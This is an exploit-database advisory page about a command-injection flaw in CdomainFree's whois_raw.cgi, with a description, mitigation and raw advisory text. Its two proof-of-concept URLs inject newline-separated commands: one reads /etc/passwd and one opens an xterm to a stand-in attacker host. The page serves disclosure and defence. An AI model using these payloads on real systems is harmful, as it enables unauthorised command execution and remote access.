header-logo
Suggest Exploit
vendor:
CdomainFree
by:
SecurityFocus
8.8
CVSS
HIGH
Command Injection
78
CWE
Product Name: CdomainFree
Affected Version From: CdomainFree
Affected Version To: CdomainFree
Patch Exists: YES
Related CWE: CVE-2000-0240
CPE: o:cdomain:cdomainfree
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2000

Command Injection in CdomainFree

A vulnerability in the whois_raw.cgi program of CdomainFree allows remote malicious users to run any executable already existing to the machine. The vulnerability is due to the program passing user input to the shell without proper filtering.

Mitigation:

Upgrade to the latest version of CdomainFree or use CdomainPro which connects to the whois servers directly.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/304/info

A vulnerability in a CGI program part of CdomainFree allows remote malicious users to run any executable already existing to the machine.

The vulnerability is in the whois_raw.cgi program. This CGI passes user input to the shell without proper filtering. None of the Cdomain commercial version (e.g. CdomainPro) are vulnerable as they connect the the whois servers directly. 

http://www.example.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.example.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20evil.example.com:0

Navigation

Suggest Exploit

Services By CQR